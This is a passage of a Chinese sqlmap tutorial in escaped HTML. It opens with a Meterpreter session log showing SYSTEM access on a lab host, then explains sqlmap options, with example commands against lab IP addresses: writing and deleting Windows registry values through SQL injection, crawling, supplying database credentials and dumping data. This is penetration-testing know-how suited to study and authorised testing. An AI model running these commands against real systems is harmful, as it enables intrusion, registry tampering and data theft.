New';\">OS&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;Windows&nbsp;.NET&nbsp;Server&nbsp;(Build&nbsp;3790,&nbsp;Service&nbsp;Pack&nbsp;2).<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Computer&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;W2K3R2<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Architecture&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;x86<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Meterpreter&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;x86\/win32<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;Server&nbsp;username:&nbsp;NT&nbsp;AUTHORITY\\SYSTEM<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;ipconfig<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">MS&nbsp;TCP&nbsp;Loopback&nbsp;interface<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Hardware&nbsp;MAC:&nbsp;00:00:00:00:00:00<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">IP&nbsp;Address&nbsp;&nbsp;:&nbsp;127.0.0.1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Netmask&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;255.0.0.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Intel(R)&nbsp;PRO\/1000&nbsp;MT&nbsp;Network&nbsp;Connection<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Hardware&nbsp;MAC:&nbsp;00:0c:29:fc:79:39<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">IP&nbsp;Address&nbsp;&nbsp;:&nbsp;192.168.136.129<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">Netmask&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;255.255.255.0<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">meterpreter&nbsp;&gt;&nbsp;exit<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span 
class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[*]&nbsp;Meterpreter&nbsp;session&nbsp;1&nbsp;closed.&nbsp;&nbsp;Reason:&nbsp;User&nbsp;exit<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9ed8\u8ba4\u60c5\u51b5\u4e0b<span>MySQL<\/span><span>\u5728<\/span><span>Windows<\/span><span>\u4e0a\u4ee5<\/span><span>SYSTEM<\/span><span>\u6743\u9650\u8fd0\u884c\uff0c<\/span><span>PostgreSQL<\/span><span>\u5728<\/span><span>Windows<\/span><span>\u4e0e<\/span><span>Linux<\/span><span>\u4e2d\u662f\u4f4e\u6743\u9650\u8fd0\u884c\uff0c<\/span><span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2000<\/span><span>\u9ed8\u8ba4\u662f\u4ee5<\/span><span>SYSTEM<\/span><span>\u6743\u9650\u8fd0\u884c\uff0c<\/span><span>Microsoft&nbsp;SQL&nbsp;Server&nbsp;2005<\/span><span>\u4e0e<\/span><span>2008<\/span><span>\u5927\u90e8\u5206\u662f\u4ee5<\/span><span>NETWORK&nbsp;SERVICE<\/span><span>\u6743\u9650\u8fd0\u884c\uff0c\u6709\u65f6\u662f<\/span><span>LOCAL&nbsp;SERVICE<\/span><span>\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E5%AF%B9Windows%E6%B3%A8%E5%86%8C%E8%A1%A8%E6%93%8D%E4%BD%9C\"><\/span>\n\t<span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u5bf9Windows\u6ce8\u518c\u8868\u64cd\u4f5c<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u5f53\u6570\u636e\u5e93\u4e3a<span>MySQL<\/span><span>\uff0c<\/span><span>PostgreSQL<\/span><span>\u6216<\/span><span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\uff0c\u5e76\u4e14\u5f53\u524d<\/span><span>web<\/span><span>\u5e94\u7528\u652f\u6301\u5806\u67e5\u8be2\u65f6\uff0c\u53ef\u4ee5\u64cd\u4f5cWindows\u6ce8\u518c\u8868\u3002\u5f53\u7136\uff0c\u5f53\u524d\u8fde\u63a5\u6570\u636e\u5e93\u7684\u7528\u6237\u4e5f\u9700\u8981\u6709\u6743\u9650\u64cd\u4f5c\u6ce8\u518c\u8868\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%AF%BB%E5%8F%96%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u8bfb\u53d6\u6ce8\u518c\u8868\u503c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--reg-read<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%86%99%E5%85%A5%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5199\u5165\u6ce8\u518c\u8868\u503c<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--reg-add<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%88%A0%E9%99%A4%E6%B3%A8%E5%86%8C%E8%A1%A8%E5%80%BC\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5220\u9664\u6ce8\u518c\u8868\u503c<\/span><span 
style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--reg-del<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E6%B3%A8%E5%86%8C%E8%A1%A8%E8%BE%85%E5%8A%A9%E9%80%89%E9%A1%B9\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u6ce8\u518c\u8868\u8f85\u52a9\u9009\u9879<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--reg-key<\/span><span>\uff0c<\/span><span>--reg-value<\/span><span>\uff0c<\/span><span>--reg-data<\/span><span>\uff0c<\/span><span>--reg-type<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u9700\u8981\u914d\u5408\u4e4b\u524d\u4e09\u4e2a\u53c2\u6570\u4f7f\u7528\uff0c\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;http:\/\/192.168.136.129\/sqlmap\/pgsql\/get_int.aspx?id=1&nbsp;--reg-add&nbsp;--reg-key=&quot;HKEY_LOCAL_MACHINE\\SOFTWARE\\sqlmap&quot;&nbsp;--reg-value=Test&nbsp;--reg-type=REG_SZ&nbsp;--reg-data=1<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h2><span class=\"ez-toc-section\" id=\"%E5%B8%B8%E8%A7%84%E5%8F%82%E6%95%B0\"><\/span>\n\t<span 
style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\">\u5e38\u89c4\u53c2\u6570<\/span><span style=\"font-weight:bold;font-size:18.0000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p class=\"p0\">\n\t<span style=\"font-size:10.5000pt;font-family:'Times New Roman';\">&nbsp;<\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BB%8Esqlite%E4%B8%AD%E8%AF%BB%E5%8F%96session\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4ecesqlite\u4e2d\u8bfb\u53d6session<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-s<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u5bf9\u6bcf\u4e00\u4e2a\u76ee\u6807\u90fd\u4f1a\u5728<\/span><span>output<\/span><span>\u8def\u5f84\u4e0b\u81ea\u52a8\u751f\u6210\u4e00\u4e2a<\/span><span>SQLite<\/span><span>\u6587\u4ef6\uff0c\u5982\u679c\u7528\u6237\u60f3\u6307\u5b9a\u8bfb\u53d6\u7684\u6587\u4ef6\u8def\u5f84\uff0c\u5c31\u53ef\u4ee5\u7528\u8fd9\u4e2a\u53c2\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E4%BF%9D%E5%AD%98HTTPS%E6%97%A5%E5%BF%97\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u4fdd\u5b58HTTP(S)\u65e5\u5fd7<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>-t<\/span><\/span><span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8fd9\u4e2a\u53c2\u6570\u9700\u8981\u8ddf\u4e00\u4e2a\u6587\u672c\u6587\u4ef6\uff0c<span>sqlmap<\/span><span>\u4f1a\u628a<\/span><span>HTTP(S)<\/span><span>\u8bf7\u6c42\u4e0e\u54cd\u5e94\u7684\u65e5\u5fd7\u4fdd\u5b58\u5230\u90a3\u91cc\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%9D%9E%E4%BA%A4%E4%BA%92%E6%A8%A1%E5%BC%8F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u975e\u4ea4\u4e92\u6a21\u5f0f<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--batch<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u7528\u6b64\u53c2\u6570\uff0c\u4e0d\u9700\u8981\u7528\u6237\u8f93\u5165\uff0c\u5c06\u4f1a\u4f7f\u7528<span>sqlmap<\/span><span>\u63d0\u793a\u7684\u9ed8\u8ba4\u503c\u4e00\u76f4\u8fd0\u884c\u4e0b\u53bb\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%BC%BA%E5%88%B6%E4%BD%BF%E7%94%A8%E5%AD%97%E7%AC%A6%E7%BC%96%E7%A0%81\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5f3a\u5236\u4f7f\u7528\u5b57\u7b26\u7f16\u7801<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New 
Roman';\">\u53c2\u6570\uff1a<span>--charset<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4e0d\u4f7f\u7528<span>sqlmap<\/span><span>\u81ea\u52a8\u8bc6\u522b\u7684\uff08\u5982<\/span><span>HTTP<\/span><span>\u5934\u4e2d\u7684<\/span><span>Content-Type<\/span><span>\uff09\u5b57\u7b26\u7f16\u7801\uff0c\u5f3a\u5236\u6307\u5b9a\u5b57\u7b26\u7f16\u7801\uff0c\u5982\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">--charset=GBK<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E7%88%AC%E8%A1%8C%E7%BD%91%E7%AB%99URL\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u722c\u884c\u7f51\u7ad9URL<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--crawl<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">sqlmap<span>\u53ef\u4ee5\u6536\u96c6\u6f5c\u5728\u7684\u53ef\u80fd\u5b58\u5728\u6f0f\u6d1e\u7684\u94fe\u63a5\uff0c\u540e\u9762\u8ddf\u7684\u53c2\u6570\u662f\u722c\u884c\u7684\u6df1\u5ea6\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5b50\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span 
class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&quot;http:\/\/192.168.21.128\/sqlmap\/mysql\/&quot;&nbsp;--batch&nbsp;--crawl=3<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[...]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:53]&nbsp;[INFO]&nbsp;starting&nbsp;crawler<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:53]&nbsp;[INFO]&nbsp;searching&nbsp;for&nbsp;links&nbsp;with&nbsp;depth&nbsp;1<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:53]&nbsp;[WARNING]&nbsp;running&nbsp;in&nbsp;a&nbsp;single-thread&nbsp;mode.&nbsp;This&nbsp;could&nbsp;take&nbsp;a&nbsp;while<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:53]&nbsp;[INFO]&nbsp;searching&nbsp;for&nbsp;links&nbsp;with&nbsp;depth&nbsp;2<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:54]&nbsp;[INFO]&nbsp;heuristics&nbsp;detected&nbsp;web&nbsp;page&nbsp;charset&nbsp;'ascii'<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[xx:xx:00]&nbsp;[INFO]&nbsp;42\/56&nbsp;links&nbsp;visited&nbsp;(75%)<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[...]<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E8%A7%84%E5%AE%9A%E8%BE%93%E5%87%BA%E5%88%B0CSV%E4%B8%AD%E7%9A%84%E5%88%86%E9%9A%94%E7%AC%A6\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u89c4\u5b9a\u8f93\u51fa\u5230CSV\u4e2d\u7684\u5206\u9694\u7b26<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--csv-del<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u5f53<span>dump<\/span><span>\u4fdd\u5b58\u4e3a<\/span><span>CSV<\/span><span>\u683c\u5f0f\u65f6\uff08<\/span><span>--dump-format=CSV<\/span><span>\uff09\uff0c\u9700\u8981\u4e00\u4e2a\u5206\u9694\u7b26\uff0c\u9ed8\u8ba4\u662f\u9017\u53f7\uff0c\u7528\u6237\u4e5f\u53ef\u4ee5\u6539\u4e3a\u522b\u7684\uff0c\u5982\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">--csv-del=&quot;;&quot;<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"DBMS%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">DBMS\u8eab\u4efd\u9a8c\u8bc1<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span 
style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--dbms-cred<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u67d0\u4e9b\u65f6\u5019\u5f53\u524d\u7528\u6237\u7684\u6743\u9650\u4e0d\u591f\uff0c\u505a\u67d0\u4e9b\u64cd\u4f5c\u4f1a\u5931\u8d25\uff0c\u5982\u679c\u77e5\u9053\u9ad8\u6743\u9650\u7528\u6237\u7684\u5bc6\u7801\uff0c\u53ef\u4ee5\u4f7f\u7528\u6b64\u53c2\u6570\u3002\u6709\u7684\u6570\u636e\u5e93\u6709\u4e13\u95e8\u7684\u8fd0\u884c\u673a\u5236\uff0c\u53ef\u4ee5\u5207\u6362\u7528\u6237\uff0c\u5982<span>Microsoft&nbsp;SQL&nbsp;Server<\/span><span>\u7684<\/span><span>OPENROWSET<\/span><span>\u51fd\u6570\u3002<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E5%AE%9A%E4%B9%89dump%E6%95%B0%E6%8D%AE%E7%9A%84%E6%A0%BC%E5%BC%8F\"><\/span>\n\t<span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u5b9a\u4e49dump\u6570\u636e\u7684\u683c\u5f0f<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>--dump-format<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u8f93\u51fa\u7684\u683c\u5f0f\u53ef\u5b9a\u4e49\u4e3a\uff1a<span>CSV<\/span><span>\uff0c<\/span><span>HTML<\/span><span>\uff0c<\/span><span>SQLITE<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<h3><span class=\"ez-toc-section\" id=\"%E9%A2%84%E4%BC%B0%E5%AE%8C%E6%88%90%E6%97%B6%E9%97%B4\"><\/span>\n\t<span 
style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\">\u9884\u4f30\u5b8c\u6210\u65f6\u95f4<\/span><span style=\"font-weight:bold;font-size:13.5000pt;font-family:'\u5b8b\u4f53';\"><\/span><br \/>\n<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53c2\u6570\uff1a<span>&#8211;eta<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u53ef\u4ee5\u8ba1\u7b97\u6ce8\u5165\u6570\u636e\u7684\u5269\u4f59\u65f6\u95f4\u3002<\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u4f8b\u5982<span>Oracle<\/span><span>\u7684\u5e03\u5c14\u578b\u76f2\u6ce8\uff1a<\/span><\/span><span style=\"font-size:12.0000pt;font-family:'Times New Roman';\"><\/span>\n<\/p>\n<p class=\"p17\">\n\t<span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">$&nbsp;python&nbsp;sqlmap.py&nbsp;-u&nbsp;&#8220;http:\/\/192.168.136.131\/sqlmap\/oracle\/get_int_bool.php?id=1&#8221;&nbsp;-b&nbsp;&#8211;eta<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">&nbsp;<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[&#8230;]<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:01]&nbsp;[INFO]&nbsp;the&nbsp;back-end&nbsp;DBMS&nbsp;is&nbsp;Oracle<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier 
New';\">[hh:mm:01]&nbsp;[INFO]&nbsp;fetching&nbsp;banner<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:01]&nbsp;[INFO]&nbsp;retrieving&nbsp;the&nbsp;length&nbsp;of&nbsp;query&nbsp;output<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">[hh:mm:01]&nbsp;[INFO]&nbsp;retrieved:&nbsp;64<\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\"><\/span><span class=\"16\" style=\"font-size:10.0000pt;font-family:'Courier New';\">17%&nbsp;[========&gt;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;]&nbsp;11\/64&nbsp;&nbsp;ETA&nbsp;00:19<\/span><span style=\"font-size:12.0000pt;font-family:'\u5b8b\u4f53';\"><\/span>\n<\/p>\n<p class=\"p18\">\n\t<span style=\"font-size:12.0000pt;font-family:'Times New Roman';\">\u7136\u540e\uff1a<\/span><span style=\"font-size:12.0000pt;font-family:'Times New 